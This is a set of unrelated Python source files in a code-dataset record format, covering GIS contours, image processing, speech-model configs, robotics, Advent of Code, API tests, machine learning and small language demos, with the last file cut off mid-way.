arcpy.CheckOutExtension(\"Spatial\")\r\n\r\n    slope_in_degrees = arcpy.sa.Slope(in_DEM, \"DEGREE\")\r\n    out_condition = arcpy.sa.Con(slope_in_degrees > 5, in_DEM)\r\n    arcpy.sa.Contour(out_condition, out_fc, contour_width, base_contour,\r\n                     z_factor)\r\n\r\n    return\r\n","sub_path":"demos/2_structure/Scripts/historicd.py","file_name":"historicd.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
{"seq_id":"580612025","text":"# -*- coding: utf-8 -*-\n\nimport cv2\nimport numpy as np\nfrom helper import *\n\n\ndef process(img, region):\n    \"\"\"\n    Extract original plate \n    :param img: original plate image\n    :param region: region information\n    \"\"\"\n    # extract plate\n    x1, y1 = np.uint(region[0])\n    x2, y2 = np.uint(region[1])\n    plate = img[x1:x2, y1:y2]\n\n    # calculate rotation angle\n    angle = abs(region[4][0])\n    if angle < 45:\n        angle = -angle\n    else:\n        angle = 90 - angle\n    # end if\n\n    # rotate plate\n    cy, cx = region[2]\n    cols = y2 - y1\n    rows = x2 - x1\n    rot_mat = cv2.getRotationMatrix2D((cy, cx), angle, 1)\n    out = cv2.warpAffine(plate, rot_mat, (cols, rows))\n\n    # resize plate\n    row, col = cfg.PLATE_DIM\n    out = cv2.resize(out, (col, 
row))\n\n return out\n# end function\n\n\ndef run(prev, cur, original):\n \"\"\"\n Run stage task\n :param prev: Previous stage number\n :param cur: Current stage number\n :param original: Stage number of plate image\n \"\"\"\n runtime = []\n util.log(\"Stage\", cur, \"Extracting the plate image\")\n for read in util.get_data(prev):\n # region data from the previous stage\n region = util.stage_data(read, prev)\n region = np.loadtxt(region)\n\n # get original image\n name = \".\".join(read.split(\".\")[1:])\n img = util.stage_image(name, original)\n img = cv2.imread(img, cv2.CV_8UC1)\n\n # get result\n plate, time = util.execute_module(process, img, region)\n runtime.append(time)\n\n # save plates to image file\n write = util.stage_image(read, cur)\n cv2.imwrite(write, plate)\n\n # log\n util.log(\"Converted\", read, \"| %.3f s\" % time, stage=cur)\n # end for\n\n return np.average(runtime)\n# end function\n","sub_path":"modules/ExtractPlate.py","file_name":"ExtractPlate.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"129394956","text":"\"\"\"small script to count the lexicon entries by cycle\n\"\"\"\nimport json\n\nwith open(\"lexicon.json\") as f:\n lexicon = json.load(f)\n\nmini = {}\nfor i, cycle in enumerate(lexicon):\n mini[str(i)] = 0 \n for entry in cycle: # each entry corresponds to a pattern\n mini[str(i)] += len(entry[0])\n\nprint(mini)\n\n\n\n\n\n","sub_path":"5_Process/_aroma_NOUN+VERB/lexicon_count.py","file_name":"lexicon_count.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"302222232","text":"# pylint: skip-file\nimport tensorflow as tf\n\nfrom open_seq2seq.data import Speech2TextDataLayer\nfrom open_seq2seq.decoders import FullyConnectedCTCDecoder\nfrom open_seq2seq.encoders import DeepSpeech2Encoder\nfrom open_seq2seq.losses import CTCLoss\nfrom open_seq2seq.models import Speech2Text\nfrom open_seq2seq.optimizers.lr_policies import exp_decay\n\n\nbase_model = Speech2Text\n\nbase_params = {\n \"random_seed\": 0,\n \"use_horovod\": False,\n \"num_epochs\": 12,\n\n \"num_gpus\": 1,\n \"batch_size_per_gpu\": 32,\n\n \"save_summaries_steps\": 100,\n \"print_loss_steps\": 10,\n \"print_samples_steps\": 5000,\n \"eval_steps\": 5000,\n \"save_checkpoint_steps\": 1000,\n \"logdir\": \"experiments/librispeech-quick\",\n\n \"optimizer\": \"Adam\",\n \"optimizer_params\": {},\n \"lr_policy\": exp_decay,\n \"lr_policy_params\": {\n \"learning_rate\": 0.0001,\n \"begin_decay_at\": 0,\n \"decay_steps\": 5000,\n \"decay_rate\": 0.9,\n \"use_staircase_decay\": True,\n \"min_lr\": 0.0,\n },\n \"dtype\": tf.float32,\n # weight decay\n \"regularizer\": tf.contrib.layers.l2_regularizer,\n \"regularizer_params\": {\n 'scale': 0.0005\n },\n \"initializer\": tf.contrib.layers.xavier_initializer,\n\n \"summaries\": ['learning_rate', 'variables', 'gradients', 'larc_summaries',\n 'variable_norm', 'gradient_norm', 'global_gradient_norm'],\n\n \"encoder\": DeepSpeech2Encoder,\n \"encoder_params\": {\n \"conv_layers\": [\n {\n \"kernel_size\": [11, 41], \"stride\": [2, 2],\n \"num_channels\": 32, \"padding\": \"SAME\"\n },\n {\n \"kernel_size\": [11, 21], \"stride\": [1, 2],\n \"num_channels\": 32, \"padding\": \"SAME\"\n }\n ],\n \"num_rnn_layers\": 2,\n \"rnn_cell_dim\": 512,\n\n \"use_cudnn_rnn\": True,\n \"rnn_type\": \"cudnn_gru\",\n \"rnn_unidirectional\": False,\n\n \"row_conv\": False,\n\n 
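# n_hidden: number of units in the fully connected layer that follows the RNN stack\n    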
\"n_hidden\": 1024,\n\n \"dropout_keep_prob\": 0.5,\n \"activation_fn\": tf.nn.relu,\n \"data_format\": \"channels_first\",\n },\n\n \"decoder\": FullyConnectedCTCDecoder,\n \"decoder_params\": {\n \"use_language_model\": False,\n\n # params for decoding the sequence with language model\n \"beam_width\": 512,\n \"alpha\": 2.0,\n \"beta\": 1.0,\n\n \"decoder_library_path\": \"ctc_decoder_with_lm/libctc_decoder_with_kenlm.so\",\n \"lm_path\": \"language_model/4-gram.binary\",\n \"trie_path\": \"language_model/trie.binary\",\n \"alphabet_config_path\": \"open_seq2seq/test_utils/toy_speech_data/vocab.txt\",\n },\n \"loss\": CTCLoss,\n \"loss_params\": {},\n}\n\ntrain_params = {\n \"data_layer\": Speech2TextDataLayer,\n \"data_layer_params\": {\n \"num_audio_features\": 96,\n \"input_type\": \"spectrogram\",\n \"augmentation\": {\n 'time_stretch_ratio': 0.05,\n 'noise_level_min': -90,\n 'noise_level_max': -60\n },\n \"vocab_file\": \"open_seq2seq/test_utils/toy_speech_data/vocab.txt\",\n \"dataset_files\": [\n \"data/librispeech/librivox-train-clean-100.csv\",\n \"data/librispeech/librivox-train-clean-360.csv\",\n ],\n \"shuffle\": True,\n },\n}\n\neval_params = {\n \"data_layer\": Speech2TextDataLayer,\n \"data_layer_params\": {\n \"num_audio_features\": 96,\n \"input_type\": \"spectrogram\",\n \"vocab_file\": \"open_seq2seq/test_utils/toy_speech_data/vocab.txt\",\n \"dataset_files\": [\n \"data/librispeech/librivox-dev-clean.csv\",\n ],\n \"shuffle\": False,\n },\n}\n","sub_path":"example_configs/speech2text/ds2_small_1gpu.py","file_name":"ds2_small_1gpu.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"551962264","text":"#!/usr/bin/env python3\r\n__author__ = 'dmmjy9'\r\n\r\nimport threading\r\nimport time\r\n\r\ndef addNum():\r\n\tglobal num\r\n\tprint('--get num:',num)\r\n\ttime.sleep(1)\r\n\tlock.acquire()\r\n\tnum -= 1\r\n\tlock.release()\r\n\r\nlock = threading.Lock()\r\nnum = 100\r\nthread_list = []\r\nfor i in range(100):\r\n\tt = threading.Thread(target=addNum)\r\n\tt.start()\r\n\tthread_list.append(t)\r\nfor t in thread_list:\r\n\tt.join()\r\n\r\nprint('final num:',num)","sub_path":"Day8/thread_test/thread_lock.py","file_name":"thread_lock.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"397705952","text":"from gym import spaces\nimport torch\n\n\nclass BitFlipEnvironment:\n def __init__(self, bits):\n self.action_space = spaces.Discrete(bits)\n self.max_steps = bits\n self.observation_space = spaces.MultiBinary(bits)\n self.goal_space = spaces.MultiBinary(bits)\n self.bits = bits\n self.state = torch.zeros((self.bits,))\n self.goal = torch.zeros((self.bits,))\n self.reset()\n\n def reset(self):\n self.state = torch.randint(2, size=(self.bits,), dtype=torch.float)\n self.goal = torch.randint(2, size=(self.bits,), dtype=torch.float)\n if torch.equal(self.state, self.goal):\n self.reset()\n return self.state.clone(), self.goal.clone()\n\n def step(self, action):\n self.state[action] = (\n 1 - self.state[action]\n ) # Flip the bit on position of the action\n reward, done = self.compute_reward(self.state, self.goal)\n return self.state.clone(), reward, done\n\n def render(self):\n print(\"State: {}\".format(self.state.tolist()))\n print(\"Goal : {}\\n\".format(self.goal.tolist()))\n\n @staticmethod\n def compute_reward(state, goal):\n done = torch.equal(state, goal)\n return 
torch.tensor(0.0 if done else -1.0), done\n","sub_path":"genrl/deep/agents/her/bitflip.py","file_name":"bitflip.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
{"seq_id":"40298934","text":"#!/usr/bin/env python3\nimport rclpy\nfrom rclpy.node import Node\nimport math\nfrom functools import partial\n\nfrom my_robot_interfaces.msg import Turtle, TurtleArray\nfrom my_robot_interfaces.srv import CatchTurtle\n\nfrom turtlesim.msg import Pose\nfrom geometry_msgs.msg import Twist\n\nclass TurtleControllerNode(Node):\n\n    def __init__(self):\n        super().__init__(\"turtle_controller\")\n        self.declare_parameter(\"catch_closest_turtle_first\", True)\n        self.catch_closest_turtle_first_ = self.get_parameter(\"catch_closest_turtle_first\").value\n        \n        self.pose_ = None\n        self.turtle_to_catch_ = None\n\n        self.alive_turtles_subscriber_ = self.create_subscription(TurtleArray, \"alive_turtles\", self.callback_alive_turtles, 10)\n        self.pose_subscriber_ = self.create_subscription(Pose, \"turtle1/pose\", self.callback_turtle_pose, 10)\n        self.cmd_vel_publisher_ = self.create_publisher(Twist, \"turtle1/cmd_vel\", 10)\n        self.control_loop_timer_ = self.create_timer(0.01, self.control_loop)\n        self.get_logger().info(\"Turtle controller has been started\")\n\n    def callback_alive_turtles(self, msg):\n        if len(msg.turtles) > 0:\n            if self.catch_closest_turtle_first_:\n                closest_turtle = None\n                closest_turtle_distance = None\n\n                for turtle in msg.turtles:\n                    dist_x = (turtle.x - self.pose_.x)\n                    dist_y = (turtle.y - self.pose_.y)\n                    distance = math.sqrt(dist_x*dist_x + dist_y*dist_y)\n                    if closest_turtle == None or distance < closest_turtle_distance:\n                        closest_turtle = turtle\n                        closest_turtle_distance = distance\n\n                self.turtle_to_catch_ = closest_turtle\n            else:\n                self.turtle_to_catch_ = msg.turtles[0]\n\n    def callback_turtle_pose(self, msg):\n        self.pose_ = msg\n\n    def control_loop(self):\n        if self.pose_ == None or self.turtle_to_catch_ == None:\n            return\n        \n        dist_x = (self.turtle_to_catch_.x - self.pose_.x)\n        dist_y = (self.turtle_to_catch_.y - self.pose_.y)\n        distance = math.sqrt(dist_x*dist_x + dist_y*dist_y)\n\n        msg = Twist()\n\n        if distance > 0.5:\n            diff = math.atan2(dist_y,dist_x) - self.pose_.theta \n            if diff > math.pi:\n                diff -= 2*math.pi\n            elif diff < -math.pi:\n                diff += 2*math.pi\n\n            msg.linear.x = 2*distance\n            msg.angular.z = 6*diff\n        else:\n            msg.linear.x = 0.0\n            msg.angular.z = 0.0\n            self.call_catch_turtle_server(self.turtle_to_catch_.name)\n            self.turtle_to_catch_ = None\n\n        self.cmd_vel_publisher_.publish(msg)\n\n    def call_catch_turtle_server(self, turtle_name):\n        client = self.create_client(CatchTurtle, \"catch_turtle\")\n        while not client.wait_for_service(1.0):\n            self.get_logger().warn(\"Waiting for Server...\")\n\n        request = CatchTurtle.Request()\n        request.name = turtle_name\n\n        future = client.call_async(request)\n        future.add_done_callback(partial(\n            self.callback_call_catch_turtle, turtle_name=turtle_name))\n\n    def callback_call_catch_turtle(self, future, turtle_name):\n        try:\n            response = future.result()\n            if not response.success:\n                self.get_logger().error(\"Turtle \" + str(turtle_name) + \" could not be caught\")\n        except Exception as e:\n            self.get_logger().error(\"Service call failed %r\" % (e,))\n\n\ndef main(args=None):\n    rclpy.init(args=args) \n    node = TurtleControllerNode()\n    rclpy.spin(node)\n    rclpy.shutdown()\n\nif __name__ == \"__main__\":\n    
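# standard rclpy entry point: init, create the node, spin until shutdown\n    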
main()","sub_path":"ros2_pkgs/turtle_catch_them_all/turtle_catch_them_all/turtle_controller.py","file_name":"turtle_controller.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"529234015","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom collections import deque, namedtuple\nfrom copy import deepcopy\nfrom intcode import Intcode, Intcode_State\n\n\ndef part1(program: list) -> int:\n visited = set((0, 0))\n Finder = namedtuple('Finder', [ 'coord', 'path', 'steps', 'intcode_state' ])\n finders = deque([ Finder(_next_coord((0, 0), d), [], 0, Intcode_State(program, [ d ])) for d in range(1, 5) ])\n while finders:\n father = finders.popleft()\n out = _move(father.intcode_state)\n if out == 2:\n return father.steps + 1\n if out == 0:\n continue\n for direction in range(1, 5):\n nxt = _next_coord(father.coord, direction)\n if nxt in visited:\n continue\n visited.add(nxt)\n child_state = deepcopy(father.intcode_state)\n child_state.input.append(direction)\n finders.appendleft(Finder(nxt, father.path + [ nxt ], father.steps + 1, child_state))\n return -1\n\n\ndef _move(state: Intcode_State) -> int:\n while not state.exit:\n if state.output:\n return state.output.pop()\n Intcode.run(state)\n return None\n\n\ndef _next_coord(coord: (int, int), mov: int) -> (int, int):\n x, y = coord\n if mov == 1:\n y += 1\n elif mov == 2:\n y -= 1\n elif mov == 3:\n x -= 1\n elif mov == 4:\n x += 1\n return (x, y)\n\n\ndef part2(program: list) -> int:\n w_map = _get_map(program)\n oxy = [ w_map.oxy_location ]\n minutes = 0\n while w_map.coordinates:\n oxy_tmp = []\n while oxy:\n for location in _get_adjacent(oxy.pop()):\n if location in w_map.coordinates:\n w_map.coordinates.remove(location)\n oxy_tmp.append(location)\n oxy = oxy_tmp\n minutes += 1\n return minutes\n\n\ndef _get_adjacent(coord: (int, int)) -> list:\n x, y = coord\n return [ (x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1) ]\n\n\nclass Map:\n def __init__(self):\n self.coordinates = set()\n\n def set_oxy_location(self, oxy_location: (int, int)):\n self.oxy_location = oxy_location\n\n def add_coord(self, coord: (int, int)):\n self.coordinates.add(coord)\n\n\ndef _get_map(program: list) -> Map:\n w_map = Map()\n visited = set((0, 0))\n Finder = namedtuple('Finder', [ 'coord', 'intcode_state' ])\n finders = deque([ Finder(_next_coord((0, 0), d), Intcode_State(program, [ d ])) for d in range(1, 5) ])\n while finders:\n father = finders.popleft()\n out = _move(father.intcode_state)\n if out == 0:\n continue\n if out == 2:\n w_map.set_oxy_location(father.coord)\n else:\n w_map.add_coord(father.coord)\n for direction in range(1, 5):\n nxt = _next_coord(father.coord, direction)\n if nxt in visited:\n continue\n visited.add(nxt)\n child_state = deepcopy(father.intcode_state)\n child_state.input.append(direction)\n finders.appendleft(Finder(nxt, child_state))\n return w_map\n\n\nif __name__ == '__main__':\n with open('input.txt') as f:\n values = list(map(int, f.read().split(',')))\n print(part1(list(values))) # 216\n print(part2(values)) # 326\n","sub_path":"2019/day_15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"41881009","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import print_function, unicode_literals\r\n\r\nimport json\r\nimport logging\r\nimport os\r\nimport random\r\nimport string\r\nimport unittest\r\n\r\nfrom 
tornado.testing import AsyncHTTPTestCase\r\n\r\nfrom bgmi.front.server import make_app\r\nfrom bgmi.main import unicode_\r\n\r\nlogging.basicConfig(level=logging.DEBUG)\r\n\r\n\r\ndef random_word(length):\r\n letters = string.ascii_lowercase\r\n return ''.join(random.choice(letters) for i in range(length))\r\n\r\n\r\nlogger = logging.getLogger()\r\nlogger.setLevel(logging.ERROR)\r\napi_list = [\r\n {\r\n 'action': 'update',\r\n 'method': 'post',\r\n 'params': '{}',\r\n }, {\r\n 'action': 'status',\r\n 'method': 'post',\r\n 'params': json.dumps({\r\n 'name': os.environ.get('BANGUMI_2'),\r\n 'status': 1,\r\n }),\r\n }\r\n]\r\n\r\n\r\n# DB.recreate_source_relatively_table()\r\n\r\n\r\nclass ApiTestCase(AsyncHTTPTestCase):\r\n # class ApiTestCase(unittest.TestCase)\r\n headers = {'BGmi-Token': '233', 'Content-Type': 'application/json'}\r\n bangumi_1 = unicode_(os.environ.get('BANGUMI_1'))\r\n bangumi_2 = unicode_(os.environ.get('BANGUMI_2'))\r\n bangumi_3 = unicode_(os.environ.get('BANGUMI_3'))\r\n\r\n def get_app(self):\r\n self.app = make_app(debug=False)\r\n return self.app\r\n\r\n def test_a_auth(self):\r\n r = self.fetch('/api/auth', method='POST', body=json.dumps({'token': '233'}))\r\n self.assertEqual(r.code, 200)\r\n res = self.parse_response(r)\r\n self.assertEqual(res['status'], 'success')\r\n\r\n r = self.fetch('/api/auth', method='POST', body=json.dumps({'token': '3'}))\r\n self.assertEqual(r.code, 400)\r\n res = self.parse_response(r)\r\n self.assertEqual(res['status'], 'error')\r\n\r\n def test_a_index(self):\r\n response = self.fetch('/', method='GET')\r\n self.assertEqual(response.code, 404)\r\n\r\n def test_a_cal(self):\r\n r = self.fetch('/api/cal', method='GET')\r\n res = self.parse_response(r)\r\n self.assertIsInstance(res['data'], dict)\r\n\r\n def test_b_add(self):\r\n r = self.fetch('/api/add', method='POST',\r\n headers=self.headers,\r\n body=json.dumps({\r\n 'name': self.bangumi_1,\r\n }))\r\n self.assertEqual(r.code, 200)\r\n\r\n r = self.fetch('/api/add', method='POST',\r\n headers=self.headers,\r\n body=json.dumps({\r\n 'name': self.bangumi_1,\r\n }))\r\n self.assertEqual(r.code, 200)\r\n r = self.parse_response(r)\r\n self.assertEqual(r['status'], 'warning')\r\n\r\n r = self.fetch('/api/add', method='POST',\r\n headers=self.headers,\r\n body=json.dumps({\r\n 'name': self.bangumi_2,\r\n }))\r\n self.assertEqual(r.code, 200)\r\n\r\n def test_c_delete(self):\r\n r = self.fetch('/api/add', method='POST',\r\n headers=self.headers,\r\n body=json.dumps({\r\n 'name': self.bangumi_2,\r\n }))\r\n self.assertEqual(r.code, 200)\r\n r = self.parse_response(r)\r\n self.assertEqual(r['status'], 'warning')\r\n\r\n r = self.fetch('/api/add', method='POST',\r\n headers=self.headers,\r\n body=json.dumps({\r\n 'name': self.bangumi_2,\r\n }))\r\n self.assertEqual(r.code, 200)\r\n r = self.parse_response(r)\r\n self.assertEqual(r['status'], 'warning')\r\n\r\n r = self.fetch('/api/add', method='POST',\r\n headers=self.headers,\r\n body=json.dumps({\r\n 'name': self.bangumi_2,\r\n }))\r\n self.assertEqual(r.code, 200)\r\n r = self.parse_response(r)\r\n self.assertEqual(r['status'], 'warning')\r\n\r\n def test_e_mark(self):\r\n episode = random.randint(0, 10)\r\n self.fetch('/api/mark', method='POST', headers=self.headers,\r\n body=json.dumps({\r\n \"name\": self.bangumi_1,\r\n \"episode\": episode\r\n }))\r\n r = self.fetch('/api/index', method='GET')\r\n self.assertEqual(r.code, 200)\r\n res = self.parse_response(r)\r\n bg_dict = {}\r\n for item in res['data']:\r\n if 
item['bangumi_name'] == self.bangumi_1:\r\n                bg_dict = item\r\n                break\r\n        self.assertEqual(bg_dict['bangumi_name'], self.bangumi_1)\r\n        self.assertEqual(bg_dict['episode'], episode)\r\n\r\n    def test_d_filter(self):\r\n        include = random_word(5)\r\n        exclude = random_word(5)\r\n        regex = random_word(5)\r\n\r\n        r = self.fetch('/api/filter', method='POST', body=json.dumps({\r\n            'name': self.bangumi_1,\r\n        }), headers=self.headers)\r\n\r\n        self.assertEqual(r.code, 200)\r\n        res = self.parse_response(r)\r\n        self.assertEqual(res['status'], 'success')\r\n\r\n        if len(res['data']['subtitle_group']) >= 2:\r\n            subtitle_group = res['data']['subtitle_group'][:1]\r\n        elif len(res['data']['subtitle_group']) == 1:\r\n            subtitle_group = res['data']['subtitle_group'][:0]\r\n        else:\r\n            subtitle_group = []\r\n        subtitle = ','.join(subtitle_group)\r\n\r\n        r = self.fetch('/api/filter', method='POST', body=json.dumps({\r\n            'name': self.bangumi_1,\r\n            'include': include,\r\n            'regex': regex,\r\n            'exclude': exclude,\r\n            'subtitle': subtitle,\r\n        }), headers=self.headers)\r\n\r\n        r = self.fetch('/api/filter', method='POST', body=json.dumps({\r\n            'name': self.bangumi_1,\r\n        }), headers=self.headers)\r\n\r\n        res = self.parse_response(r)\r\n\r\n        self.assertEqual(r.code, 200)\r\n        self.assertEqual(res['status'], 'success')\r\n        self.assertEqual(res['data']['name'], self.bangumi_1)\r\n        self.assertEqual(res['data']['include'], include)\r\n        self.assertEqual(res['data']['regex'], regex)\r\n        self.assertEqual(res['data']['exclude'], exclude)\r\n\r\n        r = self.fetch('/api/filter', method='POST', body=json.dumps({\r\n            'name': self.bangumi_3,\r\n            'regex': '.*',\r\n            'subtitle': '',\r\n        }), headers=self.headers)\r\n        self.assertEqual(r.code, 400)\r\n        self.assertEqual(self.parse_response(r)['status'], 'error')\r\n        for item in subtitle_group:\r\n            self.assertIn(item, res['data']['followed'])\r\n        for item in res['data']['followed']:\r\n            self.assertIn(item, subtitle_group)\r\n\r\n    def test_resource_ics(self):\r\n        r = self.fetch('/resource/feed.xml')\r\n        self.assertEqual(r.code, 200)\r\n\r\n    def test_resource_feed(self):\r\n        r = self.fetch('/resource/calendar.ics')\r\n        self.assertEqual(r.code, 200)\r\n\r\n    def test_no_auth(self):\r\n        r = self.fetch('/api/add', method='POST', body=json.dumps({'name': self.bangumi_1}))\r\n        self.assertEqual(r.code, 401)\r\n\r\n    @staticmethod\r\n    def parse_response(response):\r\n        r = json.loads(response.body.decode('utf-8'))\r\n        return r\r\n\r\n\r\nif __name__ == '__main__':\r\n    unittest.main()\r\n","sub_path":"tests/test_http_api.py","file_name":"test_http_api.py","file_ext":"py","file_size_in_byte":7353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
{"seq_id":"552276559","text":"import pandas as pd\nconc=pd.read_excel('Concrete_Data.xls')\nconc.to_csv('test.csv')\nwith open(\"test.csv\",'r') as f, open(\"newtest.csv\",'w') as f1:\n    next(f) \n    for line in f:\n        f1.write(line)\nconc=pd.read_csv('newtest.csv', header=None) # the header row was stripped above, so don't consume the first data row as a header\nconc.columns=['num','cement','blast','ash','water','sp','cagg','fagg','age','strength']\nfrom sklearn.model_selection import train_test_split\ny=conc['strength']\nX=conc.drop(['strength','num'],axis=1)\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=54,shuffle=True)\nfrom sklearn.ensemble import RandomForestRegressor\nclf=RandomForestRegressor(n_estimators=382, 
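# assumption: 382 trees presumably came from an earlier hyperparameter search\n    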
max_depth=None,min_samples_split=2,random_state=8)\nclf.fit(X_train,y_train)\ny_pred=clf.predict(X_test)\nprint(clf.score(X_test,y_test))\ndic=dict(zip(X.columns,clf.feature_importances_))\nfor item in sorted(dic.items(), key=lambda x: x[1], reverse=True):\n print(item[0],round(item[1],4))\ntree=clf.estimators_[5]\nfrom sklearn.tree import export_graphviz\n# Export as dot file\nimport pydotplus\nfrom io import StringIO\ndotfile=StringIO()\nexport_graphviz(tree, out_file=dotfile) \ngraph=pydotplus.graph_from_dot_data(dotfile.getvalue())\ngraph.write_png(\"tree.png\")\nfrom PIL import Image\nimage=Image.open('tree.png')\nimage.show()\n","sub_path":"concrete_rf32.py","file_name":"concrete_rf32.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"628760292","text":"# Sentence-pattern complexity and sentence-structure similarity\nimport numpy as np\nfrom stanfordcorenlp import StanfordCoreNLP\n# Load the model; this takes quite a while\nnlp = StanfordCoreNLP('stanford-corenlp-full-2016-10-31')\n\n# Judge sentence-pattern similarity via dependency parsing; returns a similarity ratio from 0 to 1\ndef sentenceSim(sentence1,sentence2):\n depecy1 = nlp.dependency_parse(sentence1)\n print(depecy1)\n depecy1 = np.array(depecy1)[:, 0]\n depecy2 = nlp.dependency_parse(sentence2)\n print(depecy2)\n depecy2 = np.array(depecy2)[:, 0]\n union = set(depecy1) & set(depecy2)\n union = [i for i in list(union) if i not in ['ROOT','punc','punct']]\n depecy1 = [i for i in list(depecy1) if i not in ['ROOT','punc','punct']]\n print(union)\n print(\"dependency result(similar)\")\n result = float(len(union)) / max(len(depecy1),len(depecy2))\n print(\"====================\")\n return result\n\n# Judge sentence-structure complexity via the constituency parse tree; returns a complexity ratio from 0 to 1\ndef sentenceComplex(sentence1,sentence2):\n# print(\"Constituency result(complex)\")\n tree1 = nlp.parse(sentence1)\n tree2 = nlp.parse(sentence2)\n# print(tree1)\n# print(tree2)\n tree1 = tree1.split('\\n ')\n tree2 = tree2.split(\"\\n \")\n result1 = 0\n for theight in tree1:\n tcount1 = 0\n for tmp in theight:\n if (tmp == '('):\n tcount1 += 1\n result1 = max(result1,tcount1)\n result2 = 0\n for theight in tree2:\n tcount2 = 0\n for tmp in theight:\n if (tmp == '('):\n tcount2 += 1\n result2 = max(result2,tcount2)\n# print(float(result2))\n# ans =abs(result2-result1)/min(result1,result2)\n ans = result2 / result1\n if ans > 1:\n return 1\n else:\n return ans\n# For testing\nif __name__ == '__main__':\n sentence1 = \"what do you mean\"\n sentence2 = \"what are you talking about\"\n print(sentenceSim(sentence1,sentence2))\n print(sentenceComplex(sentence1,sentence2))\n\n\n\n\n\n","sub_path":"model/complexity/model0.py","file_name":"model0.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"254290727","text":"# -*- coding: utf-8 -*-\n\"\"\"\nauthor: 苏亚涛\nemail: yataosu@gmail.com\ncreate_time: 2019/10/24 13:58\nfile: runtimeerror_demo.py\nide: PyCharm\n\"\"\"\n\n\ndef demo():\n raise RuntimeError(\"test\")\n\n\nrv = \"192.168.0.111:8000\"\nrv = rv.rsplit(':', 1)[0].lstrip('.')\nprint(rv)\n","sub_path":"coding/learn_python/runtimeerror_demo.py","file_name":"runtimeerror_demo.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"197631880","text":"import pos\r\nfrom pos.modules import Module\r\n\r\nclass ModuleLoader(Module):\r\n dependencies = ('base',)\r\n config = [['mod.currency', {'default': ''}]]\r\n name = 'Multiple Currencies Support'\r\n\r\n def load(self):\r\n from 
pos.modules.currency.objects.currency import Currency\r\n from pos.modules.currency.objects.currencyunit import CurrencyUnit\r\n return [Currency, CurrencyUnit]\r\n\r\n def test(self):\r\n from pos.modules.currency.objects.currency import Currency\r\n from pos.modules.currency.objects.currencyunit import CurrencyUnit\r\n \r\n LL = Currency(name='Lebanese Lira', symbol='L.L.', value=1.0, decimal_places=0, digit_grouping=True)\r\n USD = Currency(name='U.S. Dollar', symbol='USD', value=1500, decimal_places=2, digit_grouping=True)\r\n EUR = Currency(name='Euro', symbol='EUR', value=2000, decimal_places=2, digit_grouping=True)\r\n \r\n ll_values = [250, 500, 1000, 5000, 10000, 20000, 50000, 100000]\r\n usd_values = [0.01, 0.02, 0.05, 0.10, 0.20, 0.50, 1, 2, 5, 10, 20, 50, 100]\r\n eur_values = [0.01, 0.02, 0.05, 0.10, 0.20, 0.50, 1, 2, 5, 10, 20, 50, 100, 500]\r\n \r\n [CurrencyUnit(value=v, currency=LL) for v in ll_values]\r\n [CurrencyUnit(value=v, currency=USD) for v in usd_values]\r\n [CurrencyUnit(value=v, currency=EUR) for v in eur_values]\r\n \r\n session = pos.database.session()\r\n session.add(LL)\r\n session.add(USD)\r\n session.add(EUR)\r\n session.commit()\r\n\r\n def menu(self):\r\n from pos.modules.currency.panels import CurrenciesPanel\r\n \r\n return [[],\r\n [{'parent': 'System', 'label': 'Currencies', 'page': CurrenciesPanel}]]\r\n\r\n def init(self):\r\n import wx\r\n from pos.modules.currency.dialogs import CurrencyDialog\r\n from pos.modules.currency.objects.currency import Currency\r\n \r\n session = pos.database.session()\r\n currency_count = session.query(Currency).count()\r\n if currency_count == 0:\r\n dlg = CurrencyDialog(None)\r\n result = dlg.ShowModal()\r\n if result == wx.ID_OK:\r\n c = Currency(**dlg.data)\r\n session.add(c)\r\n session.commit()\r\n return c\r\n else:\r\n return False\r\n \r\n def config_panels(self):\r\n from pos.modules.currency.panels import CurrencyConfigPanel \r\n return [CurrencyConfigPanel]\r\n","sub_path":"pos/modules/currency/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"240934792","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nEnum class demo\n\n\"\"\"\nfrom enum import Enum,unique;\n\nMonth = Enum(\"Month\", ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'));\n\n# The @unique decorator helps us check that no duplicate values exist\n@unique\nclass Weekday(Enum):\n Sun = 0 # the value of Sun is set to 0\n Mon = 1\n Tue = 2\n Wed = 3\n Thu = 4\n Fri = 5\n Sat = 6\n\nif __name__ == '__main__':\n\n for name,member in Month.__members__.items():\n print(\"name: %s ; member: %s\"%(name,member));\n\n # Access these enum members\n oday = Weekday.Fri;\n print(oday);\n print(Weekday.Mon);\n print(Weekday[\"Mon\"]);\n print(Weekday.Mon.value);\n 